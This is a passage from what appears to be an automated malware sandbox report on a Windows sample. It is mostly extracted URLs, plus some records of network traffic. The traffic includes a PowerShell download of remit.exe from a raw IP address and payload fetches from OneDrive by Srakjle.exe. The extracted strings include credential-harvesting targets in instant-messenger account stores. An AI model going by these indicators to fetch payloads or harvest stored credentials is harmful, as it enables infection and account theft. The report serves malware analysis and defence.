Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: logagent.exe, 00000024.00000003.416783804.0000000004ED3000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://login.windows.local
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://management.azure.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://management.azure.com/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://messaging.office.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ncus.contentsync.
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000004.00000002.318468699.0000000006382000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://officeapps.live.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://onedrive.live.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000003.437818449.00000000006FD000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000002.514902670.0000000003850000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-e
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://osi.office.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office365.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office365.com/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://pki.goog/repository/0
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/H
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/R
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/X
Source: Srakjle.exe, 00000027.00000002.508071832.00000000006F3000.00000004.00000020.sdmp, Srakjle.exe, 00000027.00000003.437519879.000000000070F000.00000004.00000001.sdmp, bhvDE1F.tmp.36.dr	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mCKzdqFqp6PJcsuValu3wXpAJ10aLZYsSMZdX6LYKLIIDZ3mDfMFOI38WQ_NFz4VZ
Source: Srakjle.exe, 00000027.00000003.431133716.0000000000716000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000003.428428284.0000000000716000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mG0tt8DEONUJDeeBX3mq7anY0wkqxmG4_LoV_yt7E6wrWk62O0mjfoTV8YRsbm1pe
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mSwek-dYgdEwxCyJVHvgvYzlASpNpA5zBSdaeTzwyrGoCrpAXuucbmV5yu_fkzzIA
Source: Srakjle.exe, 00000022.00000003.409082210.000000000075A000.00000004.00000001.sdmp, Srakjle.exe, 00000022.00000003.408960448.0000000000752000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mUjS3QT_IWZ3lKS79ksGF1uKUu-1nZB8bE-JwZUMUqTel3FzcUuP8or2sxBmrhEN2
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mis9sNBIIhaDQ47-lbehmFGRIvDtVnvjDSK1-KaB6lFk5eST5bKR-7qC6KlyhCHcT
Source: Srakjle.exe, 00000027.00000002.508261023.0000000000716000.00000004.00000001.sdmp, Srakjle.exe, 00000027.00000003.431166013.0000000000727000.00000004.00000001.sdmp	String found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mpZ4VW86NXXaDrUZ2kx8Gnrgcq2YOm_qNhuCDPNAYjB4S8bwoonF7WAqA6PxADB2f
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://roaming.edog.
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://settings.outlook.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://staging.cortana.ai
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: logagent.exe, 00000024.00000002.425807237.0000000004EC9000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com
Source: logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.418572041.0000000004EE8000.00000004.00000001.sdmp, logagent.exe, 00000024.00000003.418520549.0000000004EEB000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: logagent.exe, 00000024.00000002.425807237.0000000004EC9000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrp
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://tasks.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://wus2.contentsync.
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhvDE1F.tmp.36.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 564D394C-9689-435B-A6D0-3C642CC99840.1.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_00422251 recv,

24_2_00422251

Source: global traffic

HTTP traffic detected: GET /remit.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 192.210.214.221Connection: Keep-Alive

Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: logagent.exe, 00000025.00000002.409992946.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
Source: logagent.exe, 00000024.00000003.418468317.0000000004EE8000.00000004.00000001.sdmp	String found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=